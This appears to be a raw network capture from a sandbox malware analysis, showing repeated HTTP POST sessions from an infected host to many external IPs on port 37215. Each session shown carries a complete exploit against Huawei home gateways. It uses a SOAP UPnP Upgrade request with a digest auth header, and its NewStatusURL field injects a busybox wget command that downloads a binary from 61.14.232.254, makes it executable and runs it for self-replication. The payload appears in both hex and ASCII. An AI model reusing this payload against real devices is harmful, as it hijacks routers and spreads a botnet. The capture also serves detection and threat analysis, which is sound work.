                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1283192.168.2.1351514147.255.189.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533198118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1284192.168.2.134056041.27.229.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533231020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1285192.168.2.134066841.109.191.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533370018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1286192.168.2.136029841.18.87.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533695936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1287192.168.2.1359420197.74.23.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533751011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1288192.168.2.1337556157.173.193.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533785105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1289192.168.2.1341714197.208.144.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533804893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1290192.168.2.1343092157.182.128.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533832073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1291192.168.2.1335324197.197.143.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533863068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1292192.168.2.1343014197.230.135.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533976078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
